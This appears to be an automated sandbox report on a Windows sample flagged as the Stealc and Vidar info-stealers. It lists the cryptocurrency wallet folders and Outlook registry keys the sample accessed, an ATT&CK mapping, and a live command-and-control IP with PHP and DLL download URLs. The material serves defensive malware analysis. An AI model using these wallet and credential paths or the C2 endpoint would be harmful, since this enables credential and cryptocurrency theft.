Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000000.00000002.2265661431.0000000001263000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2888, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2265661431.00000000011EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2888, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 2888, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	345 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	651 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://185.215.113.100/	100%	URL Reputation	malware
http://185.215.113.100/e2b1563c6670f193.php	100%	URL Reputation	malware
http://185.215.113.100	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	0%	URL Reputation	safe
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://185.215.113.100/e2b1563c6670f193.phpion:	100%	Avira URL Cloud	malware
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://185.215.113.100/0d60be0de163924d/mozglue.dllh	100%	Avira URL Cloud	malware
http://185.215.113.100/0d60be0de163924d/vcruntime140.dll	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpS_	100%	Avira URL Cloud	malware
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
http://185.215.113.100/e2b1563c6670f193.phpn	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpBrowser	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpGO4	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.php3P	100%	Avira URL Cloud	malware
http://185.215.113.100/0d60be0de163924d/mozglue.dll	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpe	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phppl	100%	Avira URL Cloud	malware
http://185.215.113.100/0d60be0de163924d/nss3.dllP	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpf	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpH	100%	Avira URL Cloud	malware
http://185.215.113.100/0d60be0de163924d/softokn3.dll4	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpive	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.phpP	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.php8	100%	Avira URL Cloud	malware
http://185.215.113.100/0d60be0de163924d/vcruntime140.dllz	100%	Avira URL Cloud	malware
http://185.215.113.100/0d60be0de163924d/vcruntime140.dllj	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.php33	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.php=I	100%	Avira URL Cloud	malware
http://www.mozilla.com/en-US/blocklist/	0%	Avira URL Cloud	safe
http://185.215.113.100/0d60be0de163924d/sqlite3.dll	100%	Avira URL Cloud	malware
http://185.215.113.100/0d60be0de163924d/softokn3.dll	100%	Avira URL Cloud	malware
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://185.215.113.100/0d60be0de163924d/freebl3.dll	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.php1	100%	Avira URL Cloud	malware
http://185.215.113.100$	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://185.215.113.100/0d60be0de163924d/nss3.dll	100%	Avira URL Cloud	malware
http://185.215.113.100e2b1563c6670f193.phpion:	0%	Avira URL Cloud	safe
http://185.215.113.100/0d60be0de163924d/msvcp140.dll	100%	Avira URL Cloud	malware
http://185.215.113.100/e2b1563c6670f193.php$	100%	Avira URL Cloud	malware
http://185.215.113.100/0d60be0de163924d/sqlite3.dll~	100%	Avira URL Cloud	malware
185.215.113.100/e2b1563c6670f193.php	100%	Avira URL Cloud	malware
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	0%	Avira URL Cloud	safe
http://185.215.113.100/e2b1563c6670f193.php=C	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.100/0d60be0de163924d/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/	true	URL Reputation: malware	unknown
http://185.215.113.100/0d60be0de163924d/mozglue.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.php	true	URL Reputation: malware	unknown
http://185.215.113.100/0d60be0de163924d/softokn3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/0d60be0de163924d/sqlite3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/0d60be0de163924d/freebl3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/0d60be0de163924d/nss3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/0d60be0de163924d/msvcp140.dll	true	Avira URL Cloud: malware	unknown
185.215.113.100/e2b1563c6670f193.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.100/0d60be0de163924d/mozglue.dllh	file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/chrome_newtab	HJECAAKK.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.100/e2b1563c6670f193.phpn	file.exe, 00000000.00000002.2265661431.00000000011E0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	HJECAAKK.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.100/e2b1563c6670f193.phpS_	file.exe, 00000000.00000002.2265661431.00000000011E0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.phpion:	file.exe, 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.phpBrowser	file.exe, 00000000.00000002.2265661431.0000000001263000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	AFHDAKJKFCFBGCBGDHCB.0.dr	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	file.exe, 00000000.00000002.2265661431.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, AFHDAKJKFCFBGCBGDHCB.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.100/e2b1563c6670f193.phpGO4	file.exe, 00000000.00000002.2265661431.00000000011E0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.php3P	file.exe, 00000000.00000002.2265661431.00000000011E0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000002.2265661431.0000000001263000.00000004.00000020.00020000.00000000.sdmp, HJECAAKK.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.100/e2b1563c6670f193.phppl	file.exe, 00000000.00000002.2265661431.0000000001263000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/0d60be0de163924d/softokn3.dll4	file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.phpf	file.exe, 00000000.00000002.2265661431.00000000011E0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.phpe	file.exe, 00000000.00000002.2265661431.00000000011E0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.phpH	file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.phpive	file.exe, 00000000.00000002.2265661431.0000000001263000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100	file.exe, 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2265661431.00000000011EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmp	true	URL Reputation: malware	unknown
http://185.215.113.100/0d60be0de163924d/nss3.dllP	file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.phpP	file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000002.2265661431.0000000001263000.00000004.00000020.00020000.00000000.sdmp, HJECAAKK.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.100/e2b1563c6670f193.php8	file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/0d60be0de163924d/vcruntime140.dllz	file.exe, 00000000.00000002.2265661431.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.php33	file.exe, 00000000.00000002.2265661431.00000000011E0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.2278395137.000000001D64D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2289768515.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, file.exe, 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.100/0d60be0de163924d/vcruntime140.dllj	file.exe, 00000000.00000002.2265661431.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100/e2b1563c6670f193.php=I	file.exe, 00000000.00000002.2265661431.00000000011E0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	HJECAAKK.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.100/e2b1563c6670f193.php1	file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	HJECAAKK.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.100/0d60be0de163924d/vcruntime140.dllZ	file.exe, 00000000.00000002.2265661431.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000002.2265661431.0000000001263000.00000004.00000020.00020000.00000000.sdmp, HJECAAKK.0.dr	false	URL Reputation: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	file.exe, 00000000.00000002.2265661431.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, AFHDAKJKFCFBGCBGDHCB.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	DBKKFCBAKKFBGCBFHJDGDGDHCA.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.100/e2b1563c6670f193.php$	file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.100e2b1563c6670f193.phpion:	file.exe, 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000002.2265661431.0000000001263000.00000004.00000020.00020000.00000000.sdmp, HJECAAKK.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.100$	file.exe, 00000000.00000002.2265661431.00000000011EE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://185.215.113.100/0d60be0de163924d/vcruntime140.dllJ	file.exe, 00000000.00000002.2265661431.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	file.exe, 00000000.00000002.2265661431.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, AFHDAKJKFCFBGCBGDHCB.0.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.2265661431.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, AFHDAKJKFCFBGCBGDHCB.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	DBKKFCBAKKFBGCBFHJDGDGDHCA.0.dr	false	URL Reputation: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	file.exe, 00000000.00000002.2265661431.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, AFHDAKJKFCFBGCBGDHCB.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.100/0d60be0de163924d/sqlite3.dll~	file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	file.exe, 00000000.00000002.2265661431.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, AFHDAKJKFCFBGCBGDHCB.0.dr	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org	DBKKFCBAKKFBGCBFHJDGDGDHCA.0.dr	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	HJECAAKK.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.100/e2b1563c6670f193.php=C	file.exe, 00000000.00000002.2265661431.00000000011E0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.100	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1501220
Start date and time:	2024-08-29 15:41:53 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/23@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 79 Number of non-executed functions: 114
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.100	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100
	file.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	185.215.113.9
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.100
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.100

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse

Created / dropped Files

C:\ProgramData\AAFBAKECAEGCBFIEGDGI

Download File

Process:	C:\Users\user\Desktop\file.exe
